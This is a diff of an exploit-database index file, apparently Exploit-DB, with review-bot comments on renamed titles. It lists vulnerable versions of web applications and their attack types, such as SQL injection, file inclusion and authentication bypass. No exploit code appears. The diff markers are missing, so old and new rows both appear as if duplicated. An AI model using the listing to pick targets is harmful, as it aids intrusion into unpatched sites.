3091,platforms/php/webapps/3091.php,"L2J Statistik Script 0.09 - 'index.php' Local File Inclusion",2007-01-07,Codebreak,php,webapps,0
3093,platforms/php/webapps/3093.txt,"AllMyGuests 0.3.0 - 'AMG_serverpath' Parameter Remote File Inclusion",2007-01-07,beks,php,webapps,0
@ -18750,7 +18753,7 @@ id,file,description,date,author,platform,type,port
4518,platforms/php/webapps/4518.txt,"WebDesktop 0.1 - Remote File Inclusion",2007-10-11,S.W.A.T.,php,webapps,0
4519,platforms/php/webapps/4519.txt,"Pindorama 0.1 - 'client.php' Remote File Inclusion",2007-10-11,S.W.A.T.,php,webapps,0
4520,platforms/php/webapps/4520.txt,"PicoFlat CMS 0.4.14 - 'index.php' Remote File Inclusion",2007-10-11,0in,php,webapps,0
4521,platforms/php/webapps/4521.txt,"Joomla! Component Flash uploader 2.5.1 - Remote File Inclusion",2007-10-11,mdx,php,webapps,0
4521,platforms/php/webapps/4521.txt,"Joomla! Component Flash Uploader 2.5.1 - Remote File Inclusion",2007-10-11,mdx,php,webapps,0
4523,platforms/php/webapps/4523.pl,"KwsPHP 1.0 Module Newsletter - SQL Injection",2007-10-11,s4mi,php,webapps,0
4524,platforms/php/webapps/4524.txt,"Joomla! Component com_colorlab 1.0 - Remote File Inclusion",2007-10-12,"Mehmet Ince",php,webapps,0
4525,platforms/php/webapps/4525.pl,"TikiWiki 1.9.8 - 'tiki-graph_formula.php' Command Execution",2007-10-12,str0ke,php,webapps,0
@ -20985,7 +20988,7 @@ id,file,description,date,author,platform,type,port
7439,platforms/php/webapps/7439.txt,"Umer Inc Songs Portal Script - 'id' Parameter SQL Injection",2008-12-12,InjEctOr5,php,webapps,0
7440,platforms/asp/webapps/7440.txt,"ColdFusion Scripts Red_Reservations - Database Disclosure",2008-12-12,Cyber-Zone,asp,webapps,0
7441,platforms/php/webapps/7441.txt,"Joomla! Component live chat - SQL Injection / Open Proxy",2008-12-12,jdc,php,webapps,0
7443,platforms/php/webapps/7443.txt,"FlexPHPNews 0.0.6 & PRO - Authentication Bypass",2008-12-14,Osirys,php,webapps,0
7443,platforms/php/webapps/7443.txt,"FlexPHPNews 0.0.6 / PRO - Authentication Bypass",2008-12-14,Osirys,php,webapps,0
7444,platforms/php/webapps/7444.txt,"Simple Text-File Login script (SiTeFiLo) 1.0.6 - File Disclosure / Remote File Inclusion",2008-12-14,Osirys,php,webapps,0
7445,platforms/asp/webapps/7445.txt,"Discussion Web 4 - Remote Database Disclosure",2008-12-14,Pouya_Server,asp,webapps,0
7446,platforms/asp/webapps/7446.txt,"ASPired2Quote - Remote Database Disclosure",2008-12-14,Pouya_Server,asp,webapps,0
@ -21023,7 +21026,7 @@ id,file,description,date,author,platform,type,port
7483,platforms/php/webapps/7483.txt,"CFAGCMS 1 - SQL Injection",2008-12-15,ZoRLu,php,webapps,0
7484,platforms/asp/webapps/7484.txt,"Click&BaneX - Multiple SQL Injections",2008-12-15,AlpHaNiX,asp,webapps,0
7485,platforms/asp/webapps/7485.txt,"clickandemail - SQL Injection / Cross-Site Scripting",2008-12-15,AlpHaNiX,asp,webapps,0
7486,platforms/asp/webapps/7486.txt,"click&rank - SQL Injection / Cross-Site Scripting",2008-12-15,AlpHaNiX,asp,webapps,0
7486,platforms/asp/webapps/7486.txt,"Click&Rank - SQL Injection / Cross-Site Scripting",2008-12-15,AlpHaNiX,asp,webapps,0
7487,platforms/php/webapps/7487.txt,"FaScript FaUpload - SQL Injection",2008-12-16,"Aria-Security Team",php,webapps,0
7488,platforms/asp/webapps/7488.txt,"Web Wiz Guestbook 8.21 - Database Disclosure",2008-12-16,"Cold Zero",asp,webapps,0
7489,platforms/php/webapps/7489.pl,"FLDS 1.2a - 'report.php' SQL Injection",2008-12-16,ka0x,php,webapps,0
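Review bot: Capitalising 7486 to "Click&Rank" leaves its sibling 7485, from the same author and date, as lowercase "clickandemail", right after "Click&BaneX" in 7484. Either normalise 7485 in the same change or confirm that the lowercase spelling is the vendor's own.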
@ -22029,7 +22032,7 @@ id,file,description,date,author,platform,type,port
9105,platforms/php/webapps/9105.txt,"MyMsg 1.0.3 - 'uid' SQL Injection",2009-07-10,Monster-Dz,php,webapps,0
9107,platforms/php/webapps/9107.txt,"Phenotype CMS 2.8 - 'login.php user' Blind SQL Injection",2009-07-10,"Khashayar Fereidani",php,webapps,0
9109,platforms/php/webapps/9109.txt,"ToyLog 0.1 - SQL Injection / Remote Code Execution",2009-07-10,darkjoker,php,webapps,0
9110,platforms/php/webapps/9110.txt,"WordPress Core & MU & Plugins - 'admin.php' Privileges Unchecked / Multiple Information Disclosures",2009-07-10,"Core Security",php,webapps,0
9110,platforms/php/webapps/9110.txt,"WordPress Core / MU / Plugins - 'admin.php' Privileges Unchecked / Multiple Information Disclosures",2009-07-10,"Core Security",php,webapps,0
9111,platforms/php/webapps/9111.txt,"Jobbr 2.2.7 - Multiple SQL Injections",2009-07-10,Moudi,php,webapps,0
9112,platforms/php/webapps/9112.txt,"Joomla! Component com_propertylab - (auction_id) SQL Injection",2009-07-10,"Chip d3 bi0s",php,webapps,0
9115,platforms/php/webapps/9115.txt,"Digitaldesign CMS 0.1 - Remote Database Disclosure",2009-07-10,darkjoker,php,webapps,0
@ -22648,7 +22651,7 @@ id,file,description,date,author,platform,type,port
10499,platforms/php/webapps/10499.txt,"eUploader PRO 3.1.1 - Cross-Site Request Forgery / Cross-Site Scripting",2009-12-16,"Milos Zivanovic",php,webapps,0
10500,platforms/php/webapps/10500.txt,"Omnistar Affiliate - Authentication Bypass",2009-12-16,R3d-D3V!L,php,webapps,0
10501,platforms/asp/webapps/10501.txt,"Texas Rankem - 'player_id' Parameter SQL Injection",2009-12-16,R3d-D3V!L,asp,webapps,0
10502,platforms/asp/webapps/10502.txt,"PRE HOTELS&RESORTS MANAGEMENT SYSTEM - Authentication Bypass",2009-12-16,R3d-D3V!L,asp,webapps,0
10502,platforms/asp/webapps/10502.txt,"Pre Hotels&Resorts Management System - Authentication Bypass",2009-12-16,R3d-D3V!L,asp,webapps,0
10503,platforms/asp/webapps/10503.txt,"ASPGuest - 'edit.asp ID' Blind SQL Injection",2009-12-16,R3d-D3V!L,asp,webapps,0
10504,platforms/asp/webapps/10504.txt,"Smart ASPad - 'campaignEdit.asp CCam' Blind SQL Injection",2009-12-16,R3d-D3V!L,asp,webapps,0
10505,platforms/asp/webapps/10505.txt,"Multi-Lingual Application - Blind SQL Injection",2009-12-17,R3d-D3V!L,asp,webapps,0
@ -23290,7 +23293,7 @@ id,file,description,date,author,platform,type,port
11623,platforms/php/webapps/11623.txt,"smartplugs 1.3 - SQL Injection showplugs.php",2010-03-03,"Easy Laster",php,webapps,0
11624,platforms/php/webapps/11624.pl,"MiNBank 1.5.0 - Remote Command Execution",2010-03-03,JosS,php,webapps,0
11625,platforms/php/webapps/11625.txt,"Joomla! Component com_blog - Directory Traversal",2010-03-03,"DevilZ TM",php,webapps,0
11627,platforms/php/webapps/11627.txt,"PHP-Nuke CMS - (Survey and Poll) SQL Injection",2010-03-04,SENOT,php,webapps,0
11627,platforms/php/webapps/11627.txt,"PHP-Nuke CMS (Survey and Poll) - SQL Injection",2010-03-04,SENOT,php,webapps,0
11631,platforms/php/webapps/11631.txt,"PHP-Nuke - user.php SQL Injection",2010-03-04,"Easy Laster",php,webapps,0
11634,platforms/hardware/webapps/11634.pl,"Sagem Routers - Remote Authentication Bypass",2010-03-04,AlpHaNiX,hardware,webapps,0
11635,platforms/php/webapps/11635.pl,"OneCMS 2.5 - SQL Injection",2010-03-05,"Ctacok and .:[melkiy]:",php,webapps,0
@ -23686,7 +23689,7 @@ id,file,description,date,author,platform,type,port
12257,platforms/php/webapps/12257.txt,"Joomla! Component com_manager 1.5.3 - 'id' Parameter SQL Injection",2010-04-16,"Islam DefenDers Mr.HaMaDa",php,webapps,0
12260,platforms/php/webapps/12260.txt,"SIESTTA 2.0 - Local File Inclusion / Cross-Site Scripting",2010-04-16,JosS,php,webapps,0
12262,platforms/php/webapps/12262.php,"Zyke CMS 1.1 - Authentication Bypass",2010-04-16,"Giuseppe 'giudinvx' D'Inverno",php,webapps,0
12266,platforms/php/webapps/12266.txt,"60 cycleCMS 2.5.2 - Cross-Site Request Forgery (Change 'Username' and Password)",2010-04-16,EL-KAHINA,php,webapps,0
12266,platforms/php/webapps/12266.txt,"60 cycleCMS 2.5.2 - Cross-Site Request Forgery (Change Username and Password)",2010-04-16,EL-KAHINA,php,webapps,0
12267,platforms/php/webapps/12267.txt,"WebAdmin - Arbitrary File Upload",2010-04-16,DigitALL,php,webapps,0
12268,platforms/php/webapps/12268.txt,"Uploader 0.7 - Arbitrary File Upload",2010-04-16,DigitALL,php,webapps,0
12269,platforms/php/webapps/12269.txt,"Joomla! Component JoltCard 1.2.1 - SQL Injection",2010-04-16,Valentin,php,webapps,0
@ -23797,7 +23800,7 @@ id,file,description,date,author,platform,type,port
12444,platforms/php/webapps/12444.txt,"PHP Video Battle - SQL Injection",2010-04-28,v3n0m,php,webapps,0
12445,platforms/php/webapps/12445.txt,"Articles Directory - Authentication Bypass",2010-04-29,Sid3^effects,php,webapps,0
12446,platforms/php/webapps/12446.txt,"TR Forum 1.5 - Multiple Vulnerabilities",2010-04-29,indoushka,php,webapps,0
12447,platforms/php/webapps/12447.txt,"XT-Commerce 1.0 Beta 1 - Pass / Creat and Download Backup",2010-04-29,indoushka,php,webapps,0
12447,platforms/php/webapps/12447.txt,"XT-Commerce 1.0 Beta 1 - Pass / Create and Download Backup",2010-04-29,indoushka,php,webapps,0
12448,platforms/php/webapps/12448.txt,"Socialware 2.2 - Upload / Cross-Site Scripting",2010-04-29,Sid3^effects,php,webapps,0
12449,platforms/php/webapps/12449.txt,"DZCP (deV!L_z Clanportal) 1.5.3 - Multiple Vulnerabilities",2010-04-29,indoushka,php,webapps,0
12450,platforms/windows/webapps/12450.txt,"Microsoft SharePoint Server 2007 - Cross-Site Scripting",2010-04-29,"High-Tech Bridge SA",windows,webapps,0
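Review bot: The 12447 title fixes "Creat" to "Create" but keeps the leading "Pass", which does not say what the issue is (password disclosure, or an authentication bypass?). Since the row is being edited anyway, replace "Pass" with the vulnerability class as described in 12447.txt.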
@ -24280,7 +24283,7 @@ id,file,description,date,author,platform,type,port
14035,platforms/php/webapps/14035.txt,"Big Forum - 'forum.php?id' SQL Injection",2010-06-24,JaMbA,php,webapps,0
14047,platforms/php/webapps/14047.txt,"2DayBiz Matrimonial Script - SQL Injection / Cross-Site Scripting",2010-06-25,Sangteamtham,php,webapps,0
14048,platforms/php/webapps/14048.txt,"2DayBiz - Multiple SQL Injections",2010-06-25,Sangteamtham,php,webapps,0
14049,platforms/php/webapps/14049.html,"Allomani Songs & Clips Script 2.7.0 - Cross-Site Request Forgery (Add Admin)",2010-06-25,G0D-F4Th3rG0D-F4Th3r,php,webapps,0
14049,platforms/php/webapps/14049.html,"Allomani Songs & Clips 2.7.0 - Cross-Site Request Forgery (Add Admin)",2010-06-25,G0D-F4Th3rG0D-F4Th3r,php,webapps,0
14050,platforms/php/webapps/14050.txt,"ARSC Really Simple Chat 3.3 - Remote File Inclusion / Cross-Site Scripting",2010-06-25,"Zer0 Thunder",php,webapps,0
14051,platforms/php/webapps/14051.txt,"2DayBiz B2B Portal Script - 'selling_buy_leads1.php' SQL Injection",2010-06-25,r45c4l,php,webapps,0
14053,platforms/php/webapps/14053.txt,"snipe Gallery Script - SQL Injection",2010-06-25,"dev!l ghost",php,webapps,0
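Review bot: The author field on the 14049 row reads "G0D-F4Th3rG0D-F4Th3r", which looks like the handle pasted twice, and the title edit leaves it untouched. Please check it against the exploit file and correct it in this change if it should be "G0D-F4Th3r"; the edit also drops "Script" from the product name while 14051 and 14053 in the same hunk keep it.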
@ -26596,7 +26599,7 @@ id,file,description,date,author,platform,type,port
21588,platforms/cgi/webapps/21588.txt,"BlackBoard 5.0 - Cross-Site Scripting",2002-07-01,"Berend-Jan Wever",cgi,webapps,0
21590,platforms/php/webapps/21590.txt,"phpAuction 1/2 - Unauthorized Administrative Access",2002-07-02,ethx,php,webapps,0
21609,platforms/cgi/webapps/21609.txt,"Fluid Dynamics Search Engine 2.0 - Cross-Site Scripting",2002-07-10,VALDEUX,cgi,webapps,0
21610,platforms/php/webapps/21610.txt,"Sun i-Runbook 2.5.2 - Directory And File Content Disclosure",2002-07-11,JWC,php,webapps,0
21610,platforms/php/webapps/21610.txt,"Sun i-Runbook 2.5.2 - Directory and File Content Disclosure",2002-07-11,JWC,php,webapps,0
21617,platforms/cgi/webapps/21617.txt,"IMHO Webmail 0.9x - Account Hijacking",2002-07-15,"Security Bugware",cgi,webapps,0
21621,platforms/jsp/webapps/21621.txt,"Macromedia Sitespring 1.2 - Default Error Page Cross-Site Scripting",2002-07-17,"Peter Gründl",jsp,webapps,0
21622,platforms/php/webapps/21622.txt,"PHP-Wiki 1.2/1.3 - Cross-Site Scripting",2002-07-17,Pistone,php,webapps,0
@ -27827,10 +27830,10 @@ id,file,description,date,author,platform,type,port
24667,platforms/php/webapps/24667.txt,"WordPress 1.2 - 'wp-login.php' HTTP Response Splitting",2004-10-07,"Chaotic Evil",php,webapps,0
24670,platforms/asp/webapps/24670.txt,"Go Smart Inc GoSmart Message Board - Multiple Input Validation Vulnerabilities",2004-10-11,"Positive Technologies",asp,webapps,0
24671,platforms/asp/webapps/24671.txt,"DUclassified 4.x - 'adDetail.asp' Multiple Parameter SQL Injections",2004-10-11,"Soroosh Dalili",asp,webapps,0
24672,platforms/asp/webapps/24672.txt,"DUclassmate 1.x - account.asp MM-recordId Parameter Arbitrary Password Modification",2004-10-11,"Soroosh Dalili",asp,webapps,0
24672,platforms/asp/webapps/24672.txt,"DUclassmate 1.x - 'account.asp MM-recordId' Arbitrary Password Modification",2004-10-11,"Soroosh Dalili",asp,webapps,0
24673,platforms/asp/webapps/24673.txt,"DUforum 3.x - Login Form Password Parameter SQL Injection",2004-10-11,"Soroosh Dalili",asp,webapps,0
24674,platforms/asp/webapps/24674.txt,"DUforum 3.x - messages.asp FOR_ID Parameter SQL Injection",2004-10-11,"Soroosh Dalili",asp,webapps,0
24675,platforms/asp/webapps/24675.txt,"DUforum 3.x - messageDetail.asp MSG_ID Parameter SQL Injection",2004-10-11,"Soroosh Dalili",asp,webapps,0
24674,platforms/asp/webapps/24674.txt,"DUforum 3.x - 'messages.asp FOR_ID' SQL Injection",2004-10-11,"Soroosh Dalili",asp,webapps,0
24675,platforms/asp/webapps/24675.txt,"DUforum 3.x - 'messageDetail.asp MSG_ID' SQL Injection",2004-10-11,"Soroosh Dalili",asp,webapps,0
24676,platforms/php/webapps/24676.txt,"SCT Campus Pipeline 1.0/2.x/3.x - Render.UserLayoutRootNode.uP Cross-Site Scripting",2004-10-13,"Matthew Oyer",php,webapps,0
24680,platforms/cfm/webapps/24680.txt,"FuseTalk Forum 4.0 - Multiple Cross-Site Scripting Vulnerabilities",2004-10-13,steven,cfm,webapps,0
24683,platforms/php/webapps/24683.txt,"Pinnacle Systems ShowCenter 1.51 - SettingsBase.php Cross-Site Scripting",2004-10-14,"Secunia Research",php,webapps,0
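Review bot: The quoting added to 24672, 24674 and 24675 skips 24673 ("Login Form Password Parameter SQL Injection") in the middle of the same DUforum group, and the 24676 and 24683 rows below still have unquoted file names. Also, "'messages.asp FOR_ID'" puts the file and the parameter in one quoted token; if that is the intended convention, apply it to the whole run so a search on the quoted form finds every entry.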
@ -32116,7 +32119,7 @@ id,file,description,date,author,platform,type,port
30855,platforms/asp/webapps/30855.txt,"WebDoc 3.0 - Multiple SQL Injections",2007-12-07,Chrysalid,asp,webapps,0
30857,platforms/php/webapps/30857.txt,"webSPELL 4.1.2 - usergallery.php galleryID Parameter Cross-Site Scripting",2007-12-10,Brainhead,php,webapps,0
30858,platforms/php/webapps/30858.txt,"webSPELL 4.1.2 - calendar.php Multiple Parameter Cross-Site Scripting",2007-12-10,Brainhead,php,webapps,0
30859,platforms/php/webapps/30859.txt,"SquirrelMail G/PGP Encryption Plugin 2.0/2.1 - Access Validation And Input Validation",2007-12-10,"Tomas Kuliavas",php,webapps,0
30859,platforms/php/webapps/30859.txt,"SquirrelMail G/PGP Encryption Plugin 2.0/2.1 - Access Validation / Input Validation",2007-12-10,"Tomas Kuliavas",php,webapps,0
30860,platforms/asp/webapps/30860.txt,"bttlxe Forum 2.0 - Multiple SQL Injections / Cross-Site Scripting Vulnerabilities",2007-12-10,Mormoroth,asp,webapps,0
30861,platforms/php/webapps/30861.txt,"E-Xoops 1.0.5/1.0.8 - mylinks/ratelink.php lid Parameter SQL Injection",2007-12-10,Lostmon,php,webapps,0
30862,platforms/php/webapps/30862.txt,"E-Xoops 1.0.5/1.0.8 - adresses/ratefile.php lid Parameter SQL Injection",2007-12-10,Lostmon,php,webapps,0
@ -32560,7 +32563,7 @@ id,file,description,date,author,platform,type,port
31546,platforms/asp/webapps/31546.txt,"DigiDomain 2.2 - lookup_result.asp domain Parameter Cross-Site Scripting",2008-03-27,Linux_Drox,asp,webapps,0
31547,platforms/asp/webapps/31547.txt,"DigiDomain 2.2 - suggest_result.asp Multiple Parameter Cross-Site Scripting",2008-03-27,Linux_Drox,asp,webapps,0
31985,platforms/hardware/webapps/31985.txt,"MICROSENS Profi Line Switch 10.3.1 - Privilege Escalation",2014-02-28,"SEC Consult",hardware,webapps,0
31549,platforms/php/webapps/31549.txt,"JAF CMS 4.0.0 RC2 - 'website' and 'main_dir' Parameters Multiple Remote File Inclusion",2008-03-27,XxX,php,webapps,0
31549,platforms/php/webapps/31549.txt,"JAF CMS 4.0.0 RC2 - 'website' / 'main_dir' Multiple Remote File Inclusion",2008-03-27,XxX,php,webapps,0
31555,platforms/php/webapps/31555.txt,"Simple Machines Forum (SMF) 1.1.4 - Multiple Remote File Inclusion",2008-03-28,Sibertrwolf,php,webapps,0
40770,platforms/php/webapps/40770.txt,"CS-Cart 4.3.10 - XML External Entity Injection",2016-11-16,0x4148,php,webapps,0
40353,platforms/php/webapps/40353.py,"Zabbix 2.0 < 3.0.3 - SQL Injection",2016-09-08,Zzzians,php,webapps,0
@ -34025,7 +34028,7 @@ id,file,description,date,author,platform,type,port
34110,platforms/php/webapps/34110.txt,"PGAUTOPro - SQL Injection / Cross-Site Scripting (2)",2010-06-09,Sid3^effects,php,webapps,0
34111,platforms/multiple/webapps/34111.txt,"(GREEZLE) Global Real Estate Agent Login - Multiple SQL Injections",2010-06-09,"L0rd CrusAd3r",multiple,webapps,0
34339,platforms/php/webapps/34339.txt,"Pligg CMS 1.0.4 - 'search.php' Cross-Site Scripting",2010-07-15,"High-Tech Bridge SA",php,webapps,0
34124,platforms/php/webapps/34124.txt,"WordPress Plugin WP BackupPlus - Database And Files Backup Download",2014-07-20,pSyCh0_3D,php,webapps,0
34124,platforms/php/webapps/34124.txt,"WordPress Plugin WP BackupPlus - Database and Files Backup Download",2014-07-20,pSyCh0_3D,php,webapps,0
34130,platforms/linux/webapps/34130.rb,"Raritan PowerIQ 4.1.0 - SQL Injection (Metasploit)",2014-07-21,"Brandon Perry",linux,webapps,80
34127,platforms/php/webapps/34127.txt,"Arab Portal 2.2 - 'members.php' SQL Injection",2010-06-10,SwEET-DeViL,php,webapps,0
34128,platforms/hardware/webapps/34128.py,"MTS MBlaze Ultra Wi-Fi / ZTE AC3633 - Multiple Vulnerabilities",2014-07-21,"Ajin Abraham",hardware,webapps,80
@ -34268,7 +34271,7 @@ id,file,description,date,author,platform,type,port
34536,platforms/php/webapps/34536.txt,"CompuCMS - Multiple SQL Injections / Cross-Site Scripting Vulnerabilities",2010-08-26,"High-Tech Bridge SA",php,webapps,0
34538,platforms/php/webapps/34538.txt,"WordPress Plugin Premium Gallery Manager - Unauthenticated Configuration Access",2014-09-05,Hannaichi,php,webapps,80
34539,platforms/php/webapps/34539.txt,"MyBB User Social Networks Plugin 1.2 - Persistent Cross-Site Scripting",2014-09-05,"Fikri Fadzil",php,webapps,80
34541,platforms/php/webapps/34541.txt,"WebsiteKit Gbplus - Name and Body Fields HTML Injection Vulnerabilities",2010-08-29,MiND,php,webapps,0
34541,platforms/php/webapps/34541.txt,"WebsiteKit Gbplus - 'Name' / 'Body' HTML Injection",2010-08-29,MiND,php,webapps,0
34543,platforms/php/webapps/34543.txt,"HP Insight Diagnostics Online Edition 8.4 - Parameters.php device Parameter Cross-Site Scripting",2010-08-31,"Mr Teatime",php,webapps,0
34544,platforms/php/webapps/34544.txt,"HP Insight Diagnostics Online Edition 8.4 - idstatusframe.php Multiple Parameter Cross-Site Scripting",2010-08-31,"Mr Teatime",php,webapps,0
34545,platforms/php/webapps/34545.txt,"HP Insight Diagnostics Online Edition 8.4 - survey.php category Parameter Cross-Site Scripting",2010-08-31,"Mr Teatime",php,webapps,0
@ -34727,7 +34730,7 @@ id,file,description,date,author,platform,type,port
35231,platforms/php/webapps/35231.txt,"Advanced Webhost Billing System (AWBS) 2.9.2 - 'oid' Parameter SQL Injection",2011-01-16,ShivX,php,webapps,0
35233,platforms/multiple/webapps/35233.txt,"B-Cumulus - 'tagcloud' Parameter Multiple Cross-Site Scripting Vulnerabilities",2011-01-18,MustLive,multiple,webapps,0
35237,platforms/multiple/webapps/35237.txt,"Gogs (label pararm) - SQL Injection",2014-11-14,"Timo Schmid",multiple,webapps,80
35238,platforms/multiple/webapps/35238.txt,"Gogs - (users and repos q pararm) SQL Injection",2014-11-14,"Timo Schmid",multiple,webapps,0
35238,platforms/multiple/webapps/35238.txt,"Gogs - users and repos q SQL Injection",2014-11-14,"Timo Schmid",multiple,webapps,0
35239,platforms/php/webapps/35239.txt,"phpCMS 2008 V2 - 'data.php' SQL Injection",2011-01-17,R3d-D3V!L,php,webapps,0
35245,platforms/php/webapps/35245.txt,"PHPAuctions - 'viewfaqs.php' SQL Injection",2011-01-19,"BorN To K!LL",php,webapps,0
35246,platforms/php/webapps/35246.py,"Joomla! Component 'com_hdflvplayer' < 2.1.0.1 - Arbitrary File Download",2014-11-15,"Claudio Viviani",php,webapps,0
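
Review bot: the new 35238 title, "Gogs - users and repos q SQL Injection", drops the parentheses without marking which words are parameter or endpoint names, so it reads less clearly than the line it replaces. The other renames in this commit quote such names ('user' / 'pass', 'website' / 'main_dir'); do the same here. The row above, 35237, still reads "Gogs (label pararm) - SQL Injection" with the "pararm" typo and the old layout, so the two Gogs rows should be fixed together.
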
@ -35089,7 +35092,7 @@ id,file,description,date,author,platform,type,port
35840,platforms/php/webapps/35840.txt,"RedaxScript 2.1.0 - Privilege Escalation",2015-01-20,"shyamkumar somana",php,webapps,80
35996,platforms/php/webapps/35996.txt,"Magento Server MAGMI Plugin - Multiple Vulnerabilities",2015-02-05,SECUPENT,php,webapps,0
35846,platforms/php/webapps/35846.txt,"WordPress Plugin Pixarbay Images 2.3 - Multiple Vulnerabilities",2015-01-20,"Hans-Martin Muench",php,webapps,80
35851,platforms/php/webapps/35851.txt,"WebFileExplorer 3.6 - 'user' and 'pass' SQL Injection",2011-06-13,pentesters.ir,php,webapps,0
35851,platforms/php/webapps/35851.txt,"WebFileExplorer 3.6 - 'user' / 'pass' SQL Injection",2011-06-13,pentesters.ir,php,webapps,0
35852,platforms/asp/webapps/35852.txt,"Microsoft Lync Server 2010 - 'ReachJoin.aspx' Remote Command Injection",2011-06-13,"Mark Lachniet",asp,webapps,0
35853,platforms/php/webapps/35853.php,"PHP-Nuke 8.3 - 'upload.php' Arbitrary File Upload (1)",2011-06-13,pentesters.ir,php,webapps,0
35854,platforms/php/webapps/35854.pl,"PHP-Nuke 8.3 - 'upload.php' Arbitrary File Upload (2)",2011-06-13,pentesters.ir,php,webapps,0
@ -35332,7 +35335,7 @@ id,file,description,date,author,platform,type,port
36214,platforms/php/webapps/36214.txt,"BuzzyWall 1.3.2 - 'resolute.php' Information Disclosure",2011-10-07,cr4wl3r,php,webapps,0
36215,platforms/php/webapps/36215.txt,"Joomla! Component com_expedition - 'id' Parameter SQL Injection",2011-10-09,"BHG Security Center",php,webapps,0
36216,platforms/php/webapps/36216.txt,"Jaws 0.8.14 - Multiple Remote File Inclusion",2011-10-10,indoushka,php,webapps,0
36220,platforms/php/webapps/36220.txt,"Joomla! Component 'com_tree' - 'key' Parameter SQL Injection",2011-10-11,CoBRa_21,php,webapps,0
36220,platforms/php/webapps/36220.txt,"Joomla! Component com_tree - 'key' Parameter SQL Injection",2011-10-11,CoBRa_21,php,webapps,0
36221,platforms/php/webapps/36221.txt,"Joomla! Component com_br - 'state_id' Parameter SQL Injection",2011-10-11,CoBRa_21,php,webapps,0
36222,platforms/php/webapps/36222.txt,"Joomla! Component 'com_shop' - 'id' Parameter SQL Injection",2011-10-11,CoBRa_21,php,webapps,0
36223,platforms/php/webapps/36223.txt,"2Moons 1.4 - Multiple Remote File Inclusion",2011-10-11,indoushka,php,webapps,0
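
Review bot: the 36220 change removes the quotes around com_tree, but 36222 two rows below keeps 'com_shop' quoted and 36221 has com_br unquoted, so this hunk leaves three adjacent Joomla! rows in two styles. Pick one convention for component names and apply it to all three; other rows in this file (37767 'com_jem', 37773 'com_memorix') use the quoted form, which suggests the edit should go the other way.
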
@ -35799,7 +35802,7 @@ id,file,description,date,author,platform,type,port
36925,platforms/php/webapps/36925.py,"elFinder 2 - Remote Command Execution (via File Creation)",2015-05-06,"TUNISIAN CYBER",php,webapps,0
36926,platforms/php/webapps/36926.txt,"LeKommerce - 'id' Parameter SQL Injection",2012-03-08,Mazt0r,php,webapps,0
36927,platforms/php/webapps/36927.txt,"ToendaCMS 1.6.2 - setup/index.php site Parameter Traversal Local File Inclusion",2012-03-08,AkaStep,php,webapps,0
36929,platforms/jsp/webapps/36929.txt,"Ilient SysAid 8.5.5 - Multiple Cross-Site Scripting and HTML Injection Vulnerabilities",2012-03-08,"Julien Ahrens",jsp,webapps,0
36929,platforms/jsp/webapps/36929.txt,"Ilient SysAid 8.5.5 - Multiple Cross-Site Scripting / HTML Injection Vulnerabilities",2012-03-08,"Julien Ahrens",jsp,webapps,0
36930,platforms/multiple/webapps/36930.txt,"WordPress Plugin Freshmail 1.5.8 - Unauthenticated SQL Injection",2015-05-07,"Felipe Molina",multiple,webapps,0
36934,platforms/asp/webapps/36934.txt,"SAP Business Objects InfoVew System - listing.aspx searchText Parameter Cross-Site Scripting",2012-03-08,vulns@dionach.com,asp,webapps,0
36935,platforms/asp/webapps/36935.txt,"SAP Business Objects InfoView System - '/help/helpredir.aspx guide' Parameter Cross-Site Scripting",2012-03-08,vulns@dionach.com,asp,webapps,0
@ -36085,7 +36088,7 @@ id,file,description,date,author,platform,type,port
37342,platforms/php/webapps/37342.txt,"TinyCMS 1.3 - admin/admin.php do Parameter Traversal Local File Inclusion",2012-06-03,KedAns-Dz,php,webapps,0
37816,platforms/multiple/webapps/37816.txt,"Cisco Unified Communications Manager - Multiple Vulnerabilities",2015-08-18,"Bernhard Mueller",multiple,webapps,0
37815,platforms/php/webapps/37815.txt,"vBulletin < 4.2.2 - Memcache Remote Code Execution",2015-08-18,"Joshua Rogers",php,webapps,80
39249,platforms/php/webapps/39249.txt,"WeBid - Multiple Cross-Site Scripting And LDAP Injection Vulnerabilities",2014-07-10,"Govind Singh",php,webapps,0
39249,platforms/php/webapps/39249.txt,"WeBid - Multiple Cross-Site Scripting / LDAP Injection Vulnerabilities",2014-07-10,"Govind Singh",php,webapps,0
37440,platforms/php/webapps/37440.txt,"Watchguard XCS 10.0 - Multiple Vulnerabilities",2015-06-30,Security-Assessment.com,php,webapps,0
37360,platforms/php/webapps/37360.txt,"GeniXCMS 0.0.3 - Cross-Site Scripting",2015-06-24,hyp3rlinx,php,webapps,80
37361,platforms/php/webapps/37361.txt,"WordPress Plugin Huge-IT Slider 2.7.5 - Multiple Vulnerabilities",2015-06-24,"i0akiN SEC-LABORATORY",php,webapps,0
@ -36126,7 +36129,7 @@ id,file,description,date,author,platform,type,port
37413,platforms/php/webapps/37413.txt,"Joomla! Component JCal Pro Calendar - SQL Injection",2012-06-15,"Taurus Omar",php,webapps,0
37414,platforms/php/webapps/37414.txt,"Simple Document Management System 1.1.5 - Multiple SQL Injections",2012-06-16,JosS,php,webapps,0
37415,platforms/php/webapps/37415.txt,"Webify Multiple Products - Multiple HTML Injection / Local File Inclusion",2012-06-16,snup,php,webapps,0
37416,platforms/java/webapps/37416.txt,"Squiz CMS - Multiple Cross-Site Scripting and XML External Entity Injection Vulnerabilities",2012-06-14,"Nadeem Salim",java,webapps,0
37416,platforms/java/webapps/37416.txt,"Squiz CMS - Multiple Cross-Site Scripting / XML External Entity Injection Vulnerabilities",2012-06-14,"Nadeem Salim",java,webapps,0
37417,platforms/php/webapps/37417.php,"Multiple WordPress Themes - 'upload.php' Arbitrary File Upload",2012-06-18,"Sammy FORGIT",php,webapps,0
37418,platforms/php/webapps/37418.php,"WordPress Plugin LB Mixed Slideshow - 'upload.php' Arbitrary File Upload",2012-06-18,"Sammy FORGIT",php,webapps,0
37419,platforms/php/webapps/37419.txt,"WordPress Plugin Wp-ImageZoom - 'file' Parameter Remote File Disclosure",2012-06-18,"Sammy FORGIT",php,webapps,0
@ -36353,7 +36356,7 @@ id,file,description,date,author,platform,type,port
37765,platforms/multiple/webapps/37765.txt,"Zend Framework 2.4.2 - PHP FPM XML eXternal Entity Injection",2015-08-13,"Dawid Golunski",multiple,webapps,0
37767,platforms/multiple/webapps/37767.txt,"Joomla! Component 'com_jem' 2.1.4 - Multiple Vulnerabilities",2015-08-13,"Martino Sani",multiple,webapps,0
37769,platforms/php/webapps/37769.txt,"Gkplugins Picasaweb - Download File",2015-08-15,"TMT zno",php,webapps,0
37770,platforms/hardware/webapps/37770.txt,"TOTOLINK Routers - Backdoor and Remote Code Execution (PoC)",2015-08-15,MadMouse,hardware,webapps,0
